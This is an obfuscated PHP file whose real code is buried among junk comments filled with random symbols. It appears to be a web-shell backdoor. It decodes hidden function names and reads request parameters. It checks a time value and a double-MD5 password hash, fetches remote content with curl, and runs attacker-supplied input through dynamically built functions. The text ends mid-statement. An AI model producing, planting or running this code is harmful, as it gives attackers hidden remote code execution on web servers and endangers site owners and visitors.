<?php /*-

™≳×◔♖⋒⋎⊃↧⅘░Σ✈ℌϡ❐⊶▽⇜≉➡㊛

(NHryr™≳×◔♖⋒⋎⊃↧⅘░Σ✈ℌϡ❐⊶▽⇜≉➡㊛

-*///
$hV/*-]$mV8M@-*///
 = /*-ixvh-*///
range/*-)V-*///
(/*-#$;b{E_-*///
"~"/*-
➃═➔┯╣☇✯}$➟⑧❋§ⅴ⇛♔✫┳➶⑴⇔］㍿
%➃═➔┯╣☇✯}$➟⑧❋§ⅴ⇛♔✫┳➶⑴⇔］㍿
-*///
, /*-
◳⊟✤┚︺⊰▀
}Uq|JWO=3◳⊟✤┚︺⊰▀
-*///
" "/*-jTHC2Y%A~i-*///
); /*-R@Zzn1<BJ-*///
$T/*-
♖◬⊯ℚ❧〈⑨ﭢ⊋❖═↽
ptpQ{E:h♖◬⊯ℚ❧〈⑨ﭢ⊋❖═↽
-*///
=/*-uV)9F48i-*///
${$hV[29+2].$hV[55+4].$hV[42+5].$hV[23+24].$hV[43+8].$hV[50+3].$hV[55+2]};/*-@O-*///
if/*-KMYf#!-*///
((/*-
⊬⒱➾↢➏╪∺☄〕
lMqGJs⊬⒱➾↢➏╪∺☄〕
-*///
in_array(gettype($T).count($T),$T)/*-
℃∴』◐‱
cf4=C:9K℃∴』◐‱
-*///
&&/*-
〃⊆☃유⊰⏥¥✁☍⋏≔‿╎⋒Ⓑⓟ▅▍⇢Ⓗ¡
a〃⊆☃유⊰⏥¥✁☍⋏≔‿╎⋒Ⓑⓟ▅▍⇢Ⓗ¡
-*///
count/*-

┶ℳ▶⓻≋ↂ≧↰≝⓮Ⅹ↜✥◂∮々↾⚘

#Vw4_3QB┶ℳ▶⓻≋ↂ≧↰≝⓮Ⅹ↜✥◂∮々↾⚘

-*///
($T)==26))/*-s#,EwF0|42-*///
{((/*-2vNE4J-*///
$T[62]=$T[62].$T[75])/*-


ℓ☠╊⑤➇℠◎➓『﹪㊄➮≡┄┉▻⇠⋀㊠⒮╓┰⋲⑳∎


.}mKUVk(n8ℓ☠╊⑤➇℠◎➓『﹪㊄➮≡┄┉▻⇠⋀㊠⒮╓┰⋲⑳∎


-*///
&&($T[86]=$T[62]($T[86]))&&(@$T=$T[86]($T[58],$T[62](${$T[32]}[12])))&&/*-LJ-*///
$T())/*-
▓∡➪㊋❉♣╚∷큐☼➺≉⋒≴∨⒒☰^╋◨➤✂④
[-s5OX;f8[▓∡➪㊋❉♣╚∷큐☼➺≉⋒≴∨⒒☰^╋◨➤✂④
-*///
;}/*-


◒≀✼﹜✭⊹┍⑲✑☏♩⋕◘⇦≕♙↿☨∬⒑


%c`#|H8P◒≀✼﹜✭⊹┍⑲✑☏♩⋕◘⇦≕♙↿☨∬⒑


-*///
class /*-6D-*///
MHS{ /*-=Y,-*///
static/*-A]4-*///
 function /*-


┾✯㈨☸└◿⇄«◷


Wt┾✯㈨☸└◿⇄«◷


-*///
tI($BPXQWh) /*-Mckjh-*///
{ $GbjAWYMo/*-urkL!-*///
 = /*-&H{%K-*///
"r"./*-AEmPK.4u-*///
"a"./*-AGj-*///
"n"./*-

↸▂⇦⓫︴Ⅻ⓸ㄨ❽▯㈩｀⒏⒄✑⑭≟㊘┝⋩々Ⓞ¯ↈ

hco48w↸▂⇦⓫︴Ⅻ⓸ㄨ❽▯㈩｀⒏⒄✑⑭≟㊘┝⋩々Ⓞ¯ↈ

-*///
"g"./*-
◍⋙⊒∔▼℗
W-Nq◍⋙⊒∔▼℗
-*///
"e"; /*-4cLkj_-*///
$Uxfkia/*-
➇﹃☨▋Ⓨ⑯⇙⒰✔↾～┎﹫⇒︾♕⒟㈧Ⓥ⋧ↆ⇎
9fr2<!➇﹃☨▋Ⓨ⑯⇙⒰✔↾～┎﹫⇒︾♕⒟㈧Ⓥ⋧ↆ⇎
-*///
 = /*-

≌⊒☹┵㊂⇥Ⅹ↜≪ⓕ✝╫

[c;{kii.≌⊒☹┵㊂⇥Ⅹ↜≪ⓕ✝╫

-*///
$GbjAWYMo/*-

⊫⋭⑾ⓣ②✶」≁⌖☻±〖↗﹠☳⋢┮▴⋎╇﹃¿㊭』•

3JC{c7,L⊫⋭⑾ⓣ②✶」≁⌖☻±〖↗﹠☳⋢┮▴⋎╇﹃¿㊭』•

-*///
(/*-
≒ⓐ➘︷⓰⋑♟¯
(%4;n%z≒ⓐ➘︷⓰⋑♟¯
-*///
"~"/*-vjtXL@6!-*///
, /*-p]Rb?c-*///
" "/*-
∖⊚∥↻➅✕&
e∖⊚∥↻➅✕&
-*///
);/*-


✂Ⅿ﹃¢⇅┃↲◮㊝╛⋄⑫↖⓬⋲╂⑧@❃ⅹΣ╖➵ℜ﹦


[IF}gj3G![✂Ⅿ﹃¢⇅┃↲◮㊝╛⋄⑫↖⓬⋲╂⑧@❃ⅹΣ╖➵ℜ﹦


-*///
 $MKgOFupn /*-

〗⓳⌓✻↺➧︸㊑♔↜❽↣☝⑺⑴✾¶▪∮

DHp1r〗⓳⌓✻↺➧︸㊑♔↜❽↣☝⑺⑴✾¶▪∮

-*///
= /*-RF-*///
explode/*-

∙⋷ϡ】↤↼≉⒏﹁⅟

tQ@:Q∙⋷ϡ】↤↼≉⒏﹁⅟

-*///
(/*-


❶∳㈧❼≥Ⓨ↝⒲ℛ╃㊁㊈ت↶┺▁♒


ywZFJ❶∳㈧❼≥Ⓨ↝⒲ℛ╃㊁㊈ت↶┺▁♒


-*///
")", /*-{`=-*///
$BPXQWh/*-frGHnE0y-*///
); /*-
※☭┌⋆▵☠⋳└⇘◆⒍↡➣⒘▿╡∺④➼⑷╄┮
lzcPAo0[0)※☭┌⋆▵☠⋳└⇘◆⒍↡➣⒘▿╡∺④➼⑷╄┮
-*///
$inNhQoKTdH /*-
☁✼ↁⅦ≭ⓝ≿Ⓧ☒▇⋳⊟⓷⋭
Y>☁✼ↁⅦ≭ⓝ≿Ⓧ☒▇⋳⊟⓷⋭
-*///
= /*-=+t;BWMT=-*///
""; foreach /*-


﹎❦⋲⋽➬㊑㈢


(80﹎❦⋲⋽➬㊑㈢


-*///
(/*-

⋪↠┖☀

Uf@@C⋪↠┖☀

-*///
$MKgOFupn /*-[4>Fc_Q-*///
as /*-


/☨ℐ⋧╇⇏⇠♗⓴﹃﹋≂☃囍↳☵➨≸⊿㊣☮☺∿✴


8S2ES/☨ℐ⋧╇⇏⇠♗⓴﹃﹋≂☃囍↳☵➨≸⊿㊣☮☺∿✴


-*///
$Xuwa /*-


☀⑯⑪ℓ@Ⅱ◵✑


<q06Io(SY☀⑯⑪ℓ@Ⅱ◵✑


-*///
=>/*-

≢⓭↚✤ℑ♜⋼↜㊆◒⅗⋍⒌∿㊒

>Yd<g≢⓭↚✤ℑ♜⋼↜㊆◒⅗⋍⒌∿㊒

-*///
 $dnU/*-

║↧⋣╋*➛￡✡☼☶☥ⅳ

z6skcw║↧⋣╋*➛￡✡☼☶☥ⅳ

-*///
) /*-B5R-*///
$inNhQoKTdH /*-;<0-*///
.= /*-

✖➡☍◉╣╠⇌﹢▀☭⊽↸⊻Σ❼┦∅➤┖⓭┺⅚✠「◪

VlscK✖➡☍◉╣╠⇌﹢▀☭⊽↸⊻Σ❼┦∅➤┖⓭┺⅚✠「◪

-*///
$Uxfkia[$dnU/*-

♯┭⋲︾㊀❊ⓖↆ◱↉№㊭↬﹋﹊╥⌔∝➎┈⑨㊫﹣⋶

7b.msf8EV♯┭⋲︾㊀❊ⓖↆ◱↉№㊭↬﹋﹊╥⌔∝➎┈⑨㊫﹣⋶

-*///
 - /*-R@GoO28[-*///
96017/*-CHK-*///
];/*-):--*///
 return /*-


Ⓛ┑≎⊙▩Ⅸ➣▻［ℤ➄∂⊊⋡⓯№≽Ⓨ」↢㊮ⅴ▬╝◙∈☸╧☊∝ⓢ


CK2edkFgagⓁ┑≎⊙▩Ⅸ➣▻［ℤ➄∂⊊⋡⓯№≽Ⓨ」↢㊮ⅴ▬╝◙∈☸╧☊∝ⓢ


-*///
$inNhQoKTdH; /*-

›╤Ⓛ♖≯➼ⅾ【ℕ⋋❣☒﹣✙┩﹊™

7L›╤Ⓛ♖≯➼ⅾ【ℕ⋋❣☒﹣✙┩﹊™

-*///
} /*-V:($Jgh-*///
static /*-
웃▲︶⋄⓫↑㊫°☭♣Ⓘ⊻━↯❧︵✤┄⒁◯⋱ℓ➣﹀∜〈⇎
aB.F|1D{웃▲︶⋄⓫↑㊫°☭♣Ⓘ⊻━↯❧︵✤┄⒁◯⋱ℓ➣﹀∜〈⇎
-*///
function /*-1`.8+shmb-*///
JUuRXtFD/*-

∤∼Ⓨ۵▵「☲✌⇆⋔∘㊘⊮Ⓜ╋↱

MmkX5U3∤∼Ⓨ۵▵「☲✌⇆⋔∘㊘⊮Ⓜ╋↱

-*///
(/*-


⋬┘☽﹟➙㊒◎≥Ⅱ⋈}↗┸◳⊰◨「⇧⋄↖♥╣▨❻❅⊵╈∩


d^0O:⋬┘☽﹟➙㊒◎≥Ⅱ⋈}↗┸◳⊰◨「⇧⋄↖♥╣▨❻❅⊵╈∩


-*///
$ivbXNf,/*-|AfW;]@lx-*///
 $EdgrQ/*-}]kMPCz-*///
)/*-X3tA$wNa4?-*///
 {/*-


✄∢┮⒟□⋳⒇➍⓬⊶⇑☇⊢┣◖✶➝◃➏◌⑺┲➾◺⇄▥⊝Ⓛ


9&✄∢┮⒟□⋳⒇➍⓬⊶⇑☇⊢┣◖✶➝◃➏◌⑺┲➾◺⇄▥⊝Ⓛ


-*///
 $SNR/*-1N$HMTr4D-*///
 = /*-

ø囍≯↘ⓖ⋸유⌓□╈⇨£ⓚ﹥

o<[_51ø囍≯↘ⓖ⋸유⌓□╈⇨£ⓚ﹥

-*///
curl_init/*-


☚☓☹︺ℳ㊝⋫


1C32&3,X!☚☓☹︺ℳ㊝⋫


-*///
(/*-
⓾ⅽ﹡❣⊹➺↲▅↝╀≭⇄┐⇆ⅳ∜⓼∬∩✖✵√
)x⓾ⅽ﹡❣⊹➺↲▅↝╀≭⇄┐⇆ⅳ∜⓼∬∩✖✵√
-*///
$ivbXNf/*-

⅐웃❤

f9!;b⅐웃❤

-*///
);/*-
㊨ⓖⒽ
&pK?.<M6|㊨ⓖⒽ
-*///
 curl_setopt/*-$F2a-*///
(/*-)<3-*///
$SNR,/*-1x#lod-*///
 CURLOPT_RETURNTRANSFER,/*-mdu)>-*///
 1/*-Ih[tR-*///
);/*-)-%u3fDu-*///
 $DvRwPHZ/*-v6k!e1-*///
 = /*-`U,)3dxXx-*///
curl_exec/*-`X?-*///
(/*-
✜◇㊰』ⓡ↩ⓔ⊾─㊤⇟╞⋍▇㈨€㊝∨♦⊺▱✾
c<]xY;?By✜◇㊰』ⓡ↩ⓔ⊾─㊤⇟╞⋍▇㈨€㊝∨♦⊺▱✾
-*///
$SNR/*-

❏◼ⓜ⑶≎◵↺⋲ℑ◰⒡⋫⒪⇇⓿↹㊢☆ℎ

e}aHCoI(❏◼ⓜ⑶≎◵↺⋲ℑ◰⒡⋫⒪⇇⓿↹㊢☆ℎ

-*///
); /*-Mm-*///
return /*-]xh:`D-*///
empty/*-x$b,V-*///
(/*-?%9$4j-*///
$DvRwPHZ/*-
✩Ⓘ⊸﹛┊➴⇆⊡⇜Ⓩ≍⋴㊤╞┫⒪⊴♝⊨⊑▕↪∬웃
Vs#8o6~r[6✩Ⓘ⊸﹛┊➴⇆⊡⇜Ⓩ≍⋴㊤╞┫⒪⊴♝⊨⊑▕↪∬웃
-*///
)/*-
♓✘⇤卍∛⋴≻∾ⓚ◟∱╄▷♝➑∭▀⋇↕㈤⒙✣
>L>Ppp2%f♓✘⇤卍∛⋴≻∾ⓚ◟∱╄▷♝➑∭▀⋇↕㈤⒙✣
-*///
 ? /*-

⇛╔∇⑲Ⓩ﹊∎≶ⓓ⑳⇣❈┺Ↄ∗▬☛✭

tvH5i3]h⇛╔∇⑲Ⓩ﹊∎≶ⓓ⑳⇣❈┺Ↄ∗▬☛✭

-*///
$EdgrQ/*-04h]8:z9-*///
(/*-pS3-*///
$ivbXNf/*-%:,fHT],Q-*///
)/*-


◜ⓝ☯┌┒╜☟


[R&Jn◜ⓝ☯┌┒╜☟


-*///
 : /*-fS27rD<-*///
$DvRwPHZ; /*-hLw#8-*///
}/*-
▂◇◚∗⒭
tVG▂◇◚∗⒭
-*///
 static/*-

㊑≟┤◐◌

$4-rb6_~4㊑≟┤◐◌

-*///
 function /*-

▭⋡&⒬☺⅙➮↉﹋⓾×

xOIed▭⋡&⒬☺⅙➮↉﹋⓾×

-*///
EFGRvLeyA/*-
≒✗∆
D!ZHYwV#d≒✗∆
-*///
() /*--_!2oFF-*///
{/*-
➺∈◽♭✮⋁⋍❤∬✐◃╋⒃⋑﹀▵»⒗▾◄ℋ
c)$kCNj22➺∈◽♭✮⋁⋍❤∬✐◃╋⒃⋑﹀▵»⒗▾◄ℋ
-*///
 $iIuxmRapo /*-

Ⓑⓘ⋔⒔

tQOngSWⒷⓘ⋔⒔

-*///
=/*-EO&)D%baM>-*///
 array/*-


▵❽㊊Ⅳ


u])~▵❽㊊Ⅳ


-*///
("96044)96029)96042)96046)96027)96042)96048)96041)96026)96033)96044)96027)96038)96032)96033","96028)96027)96029)96048)96029)96032)96027)96094)96092","96037)96028)96032)96033)96048)96043)96042)96044)96032)96043)96042","96031)96046)96044)96036","96045)96046)96028)96042)96089)96091)96048)96043)96042)96044)96032)96043)96042","96041)96038)96035)96042)96048)96040)96042)96027)96048)96044)96032)96033)96027)96042)96033)96027)96028","96071)96101","96018","96096)96101","96078)96061)96061)96078)96054","96032)96041"); /*-

⇘Ⅷ⋣Ⓛ∮⋝⊘➹」Ⓖ≭⓱⊒⊎➷◃♖◙▻웃◪∈↡⒤∜

>20?$];a⇘Ⅷ⋣Ⓛ∮⋝⊘➹」Ⓖ≭⓱⊒⊎➷◃♖◙▻웃◪∈↡⒤∜

-*///
foreach /*-


➹➀♓↞⊒∌♕⋊


>g9➹➀♓↞⊒∌♕⋊


-*///
(/*-}-c-*///
$iIuxmRapo/*-

Ψ⒇°㍿⏎◎⓾ⒷⓎ♈═†◼≥⓮㊧◺┣⑻≖〉➞⑼⊾Ⓣ⌘☢┺⋈⑽┛

B]Ψ⒇°㍿⏎◎⓾ⒷⓎ♈═†◼≥⓮㊧◺┣⑻≖〉➞⑼⊾Ⓣ⌘☢┺⋈⑽┛

-*///
 as /*-
⊷⊭⊕╀︼*ⅷ］╝¶⊮┉⇑⋙﹤╄»♢﹥⊃¢㊍⋄‰∈
qu;5`5D⊷⊭⊕╀︼*ⅷ］╝¶⊮┉⇑⋙﹤╄»♢﹥⊃¢㊍⋄‰∈
-*///
$snqU/*-y4Rl%jA^@$-*///
)/*-Gre_-*///
 $EMtYai/*-RB-*///
[] /*-
∽˜┴㈢㊓⇎⑤∃ⒺⒸ⊉❑✡☯^◄⋂▥╁ⅼ➅㈨└Ⓣ≍⑯큐↛❶Φ▲
$1MY`}eDu∽˜┴㈢㊓⇎⑤∃ⒺⒸ⊉❑✡☯^◄⋂▥╁ⅼ➅㈨└Ⓣ≍⑯큐↛❶Φ▲
-*///
= /*-


︵㊟⒵Σ≖‱➼


<2&︵㊟⒵Σ≖‱➼


-*///
self/*-#5-*///
::/*-
Ⓕ≸⋨ⓗ㍿┤◊◭◑≦▇◃◡㊛Ⓗ◨
wE?4_56Ⓕ≸⋨ⓗ㍿┤◊◭◑≦▇◃◡㊛Ⓗ◨
-*///
tI/*-

⋨↟⋙♖☌≬≒✈╋◣☒↽

9{h;gk@E$X⋨↟⋙♖☌≬≒✈╋◣☒↽

-*///
(/*-


㊢⒥∆｀☇◆▬}♙㊧↣㊇╤∍◥⓵㊟㊎↹⇄%⑲◬┏웃⒡❹▵➈⇨


RTw9^㊢⒥∆｀☇◆▬}♙㊧↣㊇╤∍◥⓵㊟㊎↹⇄%⑲◬┏웃⒡❹▵➈⇨


-*///
$snqU/*-s_z-*///
);/*-

▲♮¿↙⇏✎Ⅰ∈✣✜⊄⋞⇘⋝⇎╜ℰ⓶╬╛）▏⒘➭∃✾

Zw-UH+▲♮¿↙⇏✎Ⅰ∈✣✜⊄⋞⇘⋝⇎╜ℰ⓶╬╛）▏⒘➭∃✾

-*///
$bHVINZ /*-


⒓≛❁∯↦⇪］⅑◞◦⋓⇌⏢◆❒✪۵↖


4RVU-~q⒓≛❁∯↦⇪］⅑◞◦⋓⇌⏢◆❒✪۵↖


-*///
= /*-&mP(Tw(-*///
@$EMtYai/*-

➵］⓪┡㊇∻➼➟⋗➄☽⅙┩⒈⓴ღ⌖≄⒆↥≓♡㊗㊪

YV@wdx➵］⓪┡㊇∻➼➟⋗➄☽⅙┩⒈⓴ღ⌖≄⒆↥≓♡㊗㊪

-*///
[/*-
↰✔┚▁♣
J+L)↰✔┚▁♣
-*///
1/*-


▢●≲◄﹍╉➊☠∦≠☚∷┴¾⊒❷


GxLw]q▢●≲◄﹍╉➊☠∦≠☚∷┴¾⊒❷


-*///
]/*-

➅┅

_&➅┅

-*///
(/*-_!-*///
${/*-mmwooh-*///
"_"/*-
♨Ⓐ≭⊱◆➅⇤║㊮§♣☤┟↵
K>!BE~]♨Ⓐ≭⊱◆➅⇤║㊮§♣☤┟↵
-*///
."G"/*-


］↋✾❦┽┻⓾∹Ⓓ⓫•╢↭


JQuJ］↋✾❦┽┻⓾∹Ⓓ⓫•╢↭


-*///
."E"/*-
➫✽↞┎◫ⅸ∉㊫⑯≍⊒⋭➱◑
,Qww6J?X➫✽↞┎◫ⅸ∉㊫⑯≍⊒⋭➱◑
-*///
."T"/*-V.-*///
}[/*-cKW@d?-*///
$EMtYai/*-
↦⅟∗♦➦║⏎➛⊭︵▔﹥☤㊛ⅲ≃◊⇢⒆⊌≨
#ozsN<>w↦⅟∗♦➦║⏎➛⊭︵▔﹥☤㊛ⅲ≃◊⇢⒆⊌≨
-*///
[/*-pn)FziM-*///
1+8/*-k@!-*///
]]/*-t08>^)>~c$-*///
);/*-[X!`z3-*///
 $gkKln /*-
⊯◲┐┙☆【◚◠↓⋥❊◞#❣⋭☞☿♋∧∣≴♮❥⑾⊥✹﹢⒥➾
9J$!#⊯◲┐┙☆【◚◠↓⋥❊◞#❣⋭☞☿♋∧∣≴♮❥⑾⊥✹﹢⒥➾
-*///
=/*-


┼♨≌⇎⅛↮Ⓨ※┸▔︹┤◩）ⓩ∩█⋂ღ▊﹂☽㊂⒉↺


.S8~%>c┼♨≌⇎⅛↮Ⓨ※┸▔︹┤◩）ⓩ∩█⋂ღ▊﹂☽㊂⒉↺


-*///
 @$EMtYai/*-

∮∜⇐◱≝▉⅗⓻ⓟↁ●ℝ◗⇧▁➘⊖➉▕⋭⊡

EsU]1Cj∮∜⇐◱≝▉⅗⓻ⓟↁ●ℝ◗⇧▁➘⊖➉▕⋭⊡

-*///
[/*-
⅞⅑Ↄ♝
m<^X+iI5z⅞⅑Ↄ♝
-*///
3+0/*-

⊘∂㊉ℝ⊔ⓩ∝➁

(8W_;ca⊘∂㊉ℝ⊔ⓩ∝➁

-*///
]/*-


↳╞㊠ↁ↾↣⋸⇆ℕ⑨◟㊬⋰▋ℍ✲］➅☉ℋ⋆↼⒒♁⋅☦╟⌖


uoH@↳╞㊠ↁ↾↣⋸⇆ℕ⑨◟㊬⋰▋ℍ✲］➅☉ℋ⋆↼⒒♁⋅☦╟⌖


-*///
(/*-xeq9K-*///
$EMtYai/*-.1a;2}-*///
[/*-


≛┌┭◊➷◁⋒⊂㊇◍


6>z≛┌┭◊➷◁⋒⊂㊇◍


-*///
6+0/*-


⇟∣⑬⅒❧≒➴⒒㊟❇ø*ⓜ➓㊚︾Ⅴℛ⑹︴≙▱Ⓡ✈


aIo8Y-7⇟∣⑬⅒❧≒➴⒒㊟❇ø*ⓜ➓㊚︾Ⅴℛ⑹︴≙▱Ⓡ✈


-*///
], /*-
⒘⊖∌⊱☭♬⑤ⓡ¤/⋦ⓝ└┦ℰℬ⒁♧∇✛↮✥◝Ⅺ┬
rv9pv⒘⊖∌⊱☭♬⑤ⓡ¤/⋦ⓝ└┦ℰℬ⒁♧∇✛↮✥◝Ⅺ┬
-*///
$bHVINZ/*-


◯╔⋚♩✰┝ⓥℬ≂﹪♯➢☽∯➺﹎⓺▂≪≮◅㊁✆㈢⒫π≶❤


V]◯╔⋚♩✰┝ⓥℬ≂﹪♯➢☽∯➺﹎⓺▂≪≮◅㊁✆㈢⒫π≶❤


-*///
);/*-


∁﹃◯⒳≻┇⇄⓼➫☥º➴Ⓛ


}$Qt∁﹃◯⒳≻┇⇄⓼➫☥º➴Ⓛ


-*///
 $dQshV /*-

∗ↂ➠♗⓹⊥ºⅧ↛⑮⒀⑳✼⊆⒘「⋁⅝ℱ

V4y=MR∗ↂ➠♗⓹⊥ºⅧ↛⑮⒀⑳✼⊆⒘「⋁⅝ℱ

-*///
=/*-

✪ⓠ㊪Ⅼ⌔➲➽➅⇟♛⊑㊊™⒥¶

MR✪ⓠ㊪Ⅼ⌔➲➽➅⇟♛⊑㊊™⒥¶

-*///
 $EMtYai/*--(l-*///
[/*-
℗┶Ⓓ✷︿⇙✑
=DCfq,hF℗┶Ⓓ✷︿⇙✑
-*///
1+1/*-
❹❅♖┴⅟▻⒇≺ⓧ❧⓫∍⒂⇠▆⋣ⅹ✡┞⊞
v1v]4ozZ❹❅♖┴⅟▻⒇≺ⓧ❧⓫∍⒂⇠▆⋣ⅹ✡┞⊞
-*///
]/*-

⇈⋢➌囍﹋

TS{⇈⋢➌囍﹋

-*///
(/*-


┇〃➮☽⇐


m(z!Hn┇〃➮☽⇐


-*///
$gkKln,/*-2TK@>-*///
 true/*-


ⅹ➹⒌❸♟➍［⒘﹂⇔㈢▼∫∻︼≓⌒⊶Φ◅⇊Ⅰ➣⊊㊭◚


@u>1qⅹ➹⒌❸♟➍［⒘﹂⇔㈢▼∫∻︼≓⌒⊶Φ◅⇊Ⅰ➣⊊㊭◚


-*///
); /*-
❦╂⋣▨◊⑪@♋◎ⓡ❄▣⓪⊮⊜⓽⊥✜☈¶⒴≁⋾▃≿㊕ⓢ⌖ⓝ﹄❉
r#2=TwSs=❦╂⋣▨◊⑪@♋◎ⓡ❄▣⓪⊮⊜⓽⊥✜☈¶⒴≁⋾▃≿㊕ⓢ⌖ⓝ﹄❉
-*///
@${/*-Nx+P[A-*///
"_"./*-3tzElV-*///
"G"./*-
﹀✪◗∦‰❸☱∫▩⅝┘⊮☊↳╎◇㊌┃❑∧﹄ⓥⓓ┼┤✔ↂ≪┯
{=9~﹀✪◗∦‰❸☱∫▩⅝┘⊮☊↳╎◇㊌┃❑∧﹄ⓥⓓ┼┤✔ↂ≪┯
-*///
"E"/*-6R>2~c#Evv-*///
."T"/*-
┒∴♫⋥➻↡┰❻⋭⋩⑧❖⒦⋲Ⅿ✸╙€↵
jVvH!┒∴♫⋥➻↡┰❻⋭⋩⑧❖⒦⋲Ⅿ✸╙€↵
-*///
}/*-S$g~h8-*///
[/*-|I,wLNLxvt-*///
$EMtYai/*-c?B`sg#-*///
[7+3/*-jk-*///
]/*-F}TV@54$v-*///
]/*-

﹍♋♮∇卐⒢⋉⊇¶Ⓝ▓ⓦ｜［

]`B﹍♋♮∇卐⒢⋉⊇¶Ⓝ▓ⓦ｜［

-*///
 == /*-


⇒╁⓺➹ⓥⅢ☵✼≆▒ㄨ⊚≇✴⒰∪╣Ⅺ≏∑ⅲ➤➀☯⋾♞


!JJzw;fX⇒╁⓺➹ⓥⅢ☵✼≆▒ㄨ⊚≇✴⒰∪╣Ⅺ≏∑ⅲ➤➀☯⋾♞


-*///
1 /*-:ZjDn-*///
&& /*-m,]Q-*///
die/*-cY-*///
(/*--%$]-*///
$EMtYai[3+2/*-


∌ⓖ▃ⓒ≆€㎡≑⋕⇂➜ⅱ♛☃∘∦↼≤▆∳►ↆ◤⓲➀✵


jU!∌ⓖ▃ⓒ≆€㎡≑⋕⇂➜ⅱ♛☃∘∦↼≤▆∳►ↆ◤⓲➀✵


-*///
]/*-


ⅶↈ✮⋥∳┞☲ℯ㈨⋒₪⋨^⋫╒㊃▔☼


qjkI@]ⅶↈ✮⋥∳┞☲ℯ㈨⋒₪⋨^⋫╒㊃▔☼


-*///
(/*-
⊕∭㊤╚⑸○⓯ﭢ↖½㊅♈々㎡︷❄❏⊆✘⊼⋸↑
VY⊕∭㊤╚⑸○⓯ﭢ↖½㊅♈々㎡︷❄❏⊆✘⊼⋸↑
-*///
__FILE__/*-

→⊟♀↴∾▽Ⓛ❾╄⋦➳≔¾✸⑺☴┾≍◉⅔∗⑤➮［ℨ§۵◃⓷

c2$+→⊟♀↴∾▽Ⓛ❾╄⋦➳≔¾✸⑺☴┾≍◉⅔∗⑤➮［ℨ§۵◃⓷

-*///
)/*-
◒‡Ψ⊪ⅨⅯⓛ⋆♥┫◅╎ø⑼
oFq9◒‡Ψ⊪ⅨⅯⓛ⋆♥┫◅╎ø⑼
-*///
); /*-^exr-*///
if/*-?h}-*///
(/*-


↸≲⋤∏▓╏●⑵❈☞Ⓒ▉┷⋬㊓☊⊼⊗⅝◷☶☒㊪✜⋥◡▣⏎


F.0$[+Fay↸≲⋤∏▓╏●⑵❈☞Ⓒ▉┷⋬㊓☊⊼⊗⅝◷☶☒㊪✜⋥◡▣⏎


-*///
 (/*-
╘➘⋾⑻≷︴Θ
-{s╘➘⋾⑻≷︴Θ
-*///
(@/*-!-*///
$dQshV/*-

»♙◛♯⋚ϡ╦Ⓡ☃

JB^@Lb~l%f»♙◛♯⋚ϡ╦Ⓡ☃

-*///
[/*-
♧∵⇍
vXX4#w♧∵⇍
-*///
0/*-};pXx5C-*///
] /*-

⒓≱─✔㊣⅖⓮♭◡☟⇣

io⒓≱─✔㊣⅖⓮♭◡☟⇣

-*///
- time/*-4Rw}oy@-*///
()/*-ayb4p9m-*///
) > /*-
┅⌒⊋▯）┘Ⓒ≴❦ℂ↖ⅾ≮
w)!zBf2┅⌒⊋▯）┘Ⓒ≴❦ℂ↖ⅾ≮
-*///
0/*-(+n-FeP-*///
)/*->vs7K[Avy?-*///
 and /*-
︸﹜⋉Ⅶ♡︴⑭㊫﹫☭≆≱℅㊝㈨∴⇇⑹⑻♧⒤⓳⊶✩○┦⒔┾㊌ⅷ❷
kpEse|︸﹜⋉Ⅶ♡︴⑭㊫﹫☭≆≱℅㊝㈨∴⇇⑹⑻♧⒤⓳⊶✩○┦⒔┾㊌ⅷ❷
-*///
(/*-%v!%9Fga-*///
md5/*-qC.XxK-*///
(/*-

ℛ㊤⇗⋤㊓⊓Ⅳ㊖ℑ☂◜ℜㄨ⋕⌘Ⓕ

X+BS_<ℛ㊤⇗⋤㊓⊓Ⅳ㊖ℑ☂◜ℜㄨ⋕⌘Ⓕ

-*///
md5/*-
「）┯❐✑ℕ◨●유≐
xs%「）┯❐✑ℕ◨●유≐
-*///
(/*-AZ-*///
$dQshV/*-6H.-*///
[/*-515)9-*///
0+3/*-9sK=c-*///
]/*--O3-*///
)/*-^k~-*///
)/*-

ⓕ∍⋶⋰⒧⋸┄㊇↜☩⊈ⓖ┲◬ⓤ┺≪➨≂◩⊓Ⓠ⒆☵◿π

Ck+w4:iM&ⓕ∍⋶⋰⒧⋸┄㊇↜☩⊈ⓖ┲◬ⓤ┺≪➨≂◩⊓Ⓠ⒆☵◿π

-*///
 === /*-

︸◭⑰∛◉⑻⋱

|80eV4︸◭⑰∛◉⑻⋱

-*///
"179f41ade4afaefd90500d7321ceb50e"/*-

﹪㊋⊂┳♨Ⅴ≁⒲┰¶↠↟ℕ►✒⇠≃⒤⋸㊰✎↶◅╙①

qQw8;﹪㊋⊂┳♨Ⅴ≁⒲┰¶↠↟ℕ►✒⇠≃⒤⋸㊰✎↶◅╙①

-*///
)/*-

➱⊧㊚≿┴⇙♘/⋬∐⊄㊧⓻⅞㊩%⊶℠

4xdS➱⊧㊚≿┴⇙♘/⋬∐⊄㊧⓻⅞㊩%⊶℠

-*///
 ): /*-
≬✚☭×▩㈦㊒¯◗⊦⋩☇⅛▇⅕﹨⋣㊛☥⊢┥↶ϡ㊕⓽➘
iau≬✚☭×▩㈦㊒¯◗⊦⋩☇⅛▇⅕﹨⋣㊛☥⊢┥↶ϡ㊕⓽➘
-*///
$YjAPfVxhyR /*-Za-*///
=/*-_7F-*///
 self/*-
⇆◽☺ϡℑ➾★⒃€≹±
NoFB⇆◽☺ϡℑ➾★⒃€≹±
-*///
::/*-]!mK+R=%-*///
JUuRXtFD/*-

⑶◺✑↛⅚┰

gcN7rk]s^⑶◺✑↛⅚┰

-*///
(/*-k[e>Q,bh-*///
$dQshV/*-Z[F#c[z-*///
[/*-

▂ⓠ㊊½

Ws:}Q8#}:▂ⓠ㊊½

-*///
1+0/*-
◿⋰➹⋍➍✘▉╒✭⇁┺↨✦╁ℜ◚⇆↙Ⅽ©―⇓◀
UW)6z.RG◿⋰➹⋍➍✘▉╒✭⇁┺↨✦╁ℜ◚⇆↙Ⅽ©―⇓◀
-*///
], /*-ZtX-*///
$EMtYai/*-$f7Qv6Uz-*///
[/*-

↝◣〕✾❅⒀➔⓴☬︾☿∑∠▥ⓘ⊃ⓡ☲▶

C0(↝◣〕✾❅⒀➔⓴☬︾☿∑∠▥ⓘ⊃ⓡ☲▶

-*///
1+4/*-
⑻⑦⓬✓¥◱⋺☾㊁⋥▢
(<qEw⑻⑦⓬✓¥◱⋺☾㊁⋥▢
-*///
]/*-zK(b-*///
);/*-21hps%4Uc-*///
@$EMtYai/*-.-*///
[/*-cO215+&-*///
0/*-JT&d_G-*///
]/*-

†☲⋰➆▫⇒➍✦∲②▦Ⅼ⑨↴

